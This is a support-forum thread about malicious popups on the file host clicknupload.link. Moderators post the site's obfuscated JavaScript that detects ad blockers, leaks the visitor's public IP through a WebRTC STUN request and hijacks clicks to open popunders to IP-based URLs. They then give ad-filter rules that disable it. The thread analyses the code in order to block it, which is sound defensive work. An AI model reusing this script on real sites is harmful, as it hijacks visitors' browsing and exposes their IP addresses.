[Resolved] clicknupload.link

Cynicle

New Member
Hi there,

Just bumping this thread to see if a solution was ever realised. I used to love clicknupload, even paid for premium in the past when I was using it a lot for hosting and sharing work files, but now that I get ransomware websites popping up (and going into full screen and preventing escape to normal!) I find it almost unusable.

Any help would be appreciated.

Thanks,
Cyn
 

Cynicle

New Member
Apologies, I wanted to include a link in my post but wasn't able as I moved away from Clicknupload due to this issue. I googled to try and find one but they're not as easy to come across as I would have hoped for.

I think the issue is with Javascript, utilising a sneaky invisible button over the free download graphic which fulfills the user consent request which is usually required for that level of browser control. When Javascript is disabled the popup doesn't appear, however you also can't download the file.

Thanks for trying to help, I might look around some other apps and see if I can find one which gives me a bit of fine control over javascript permissions, as I'm worried that Clicknupload won't be the last site I find using malicious code (well at least the external site they redirect you to).
 

Cynicle

New Member
Using your link I could reproduce the problem (although it is slightly different this time, not enforcing fullscreen lock (although I may have closed the tab before it had the opportunity).

 

Blaz

Moderator & Translator
Staff member
Moderator
I was able to reproduce on my Android (but not always).
https://forum.adguard.com/index.php?threads/bad-sites.13804/

Responsible code is this:

Code:
(function() {
    var was_init = false;
    function init_myscript() {
        if (was_init)
            return;
        was_init = true;
        var c = document.createElement("div");
        c.innerHTML = " ";
        c.className = "adsbox";
        document.body.appendChild(c);
        window.setTimeout(function() {
            if (0 === c.offsetHeight) {
                var l = 0
                  , d = new (window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)({
                    iceServers: [{
                        url: "stun:1755001826:443"
                    }]
                },{
                    optional: [{
                        RtpDataChannels: !0
                    }]
                });
                d.onicecandidate = function(b) {
                    var e = "";
                    !b.candidate || (b.candidate && b.candidate.candidate.indexOf('srflx') == -1) || !(b = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(b.candidate.candidate)[1]) || m || b.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/) || b.match(/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$/) || (m = !0,
                    e = b,
                    document.onclick = function() {
                        current_count = parseInt((document.cookie.match("noprptdgjiarwvbmecnt=([^;].+?)(;|$)") || [])[1] || 0);
                        if (!l && 2 > current_count) {
                            l = 1;
                            var a = document.createElement("a")
                              , b = Math.floor(1E12 * Math.random())
                              , f = Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
                            a.href = "http://" + e + "/" + n.encode(b + "/" + (1352913 + b) + "/" + f);
                            a.target = "_blank";
                            document.body.appendChild(a);
                            b = new MouseEvent("click",{
                                view: window,
                                bubbles: !1,
                                cancelable: !1
                            });
                            a.dispatchEvent(b);
                            a.parentNode.removeChild(a);
                            a = new Date;
                            a.setTime(a.getTime() + 60000);
                            b_date = (existing_date = unescape((document.cookie.match("noprptdgjiarwvbmeexp=([^;].+?)(;|$)") || [])[1] || "")) ? existing_date : a.toGMTString();
                            a = "; expires=" + b_date;
                            document.cookie = "noprptdgjiarwvbmecnt=" + (current_count + 1) + a + "; path=/";
                            document.cookie = "noprptdgjiarwvbmeexp=" + b_date + a + "; path=/"
                        }
                    }
                    )
                }
                ;
                d.createDataChannel("");
                d.createOffer(function(b) {
                    d.setLocalDescription(b, function() {}, function() {})
                }, function() {})
            }
            Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
            var m = !1
              , n = {
                _0: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
                encode: function(b) {
                    for (var e = "", a, c, f, d, k, g, h = 0; h < b.length; )
                        a = b.charCodeAt(h++),
                        c = b.charCodeAt(h++),
                        f = b.charCodeAt(h++),
                        d = a >> 2,
                        a = (a & 3) << 4 | c >> 4,
                        k = (c & 15) << 2 | f >> 6,
                        g = f & 63,
                        isNaN(c) ? k = g = 64 : isNaN(f) && (g = 64),
                        e = e + this._0.charAt(d) + this._0.charAt(a) + this._0.charAt(k) + this._0.charAt(g);
                    return e
                }
            }
        }, 100)
    }
    document.addEventListener("DOMContentLoaded", function() {
        init_myscript();
    });
    window.setTimeout(init_myscript, 120)
})();
Please try this rule (worked on my Android):
Code:
clicknupload.link#%#Object.defineProperty(document, 'onclick', { get: function() { null; } });
 
Last edited:

Alex302

Filters Developer
Staff member
Administrator
Or
Code:
clicknupload.link#%#Object.defineProperty(window, 'was_init', { get: function() { return true; } });
I can't reproduce even on Android.

@Cynicle Which Adguard version, filters and browser are you using?
 

Blaz

Moderator & Translator
Staff member
Moderator
Is there a way to block the bad RTCPeerConnection too?
 

worldsdream

Beta Tester
Can you reproduce currently? Just tried on https://clicknupload.link/yuxehe0s2eks and no popup here (don't have MAC though).
yes on mac you get a popup

1) click on free download
2) page refreshes and gives you a new button to click to download
3) click anywhere or the download button and it gives you a popup
4) you can click on download to download

this is happening on firefox mac, chrome on mac is working fine
yes I cleared cache completely.
 
Last edited:
Top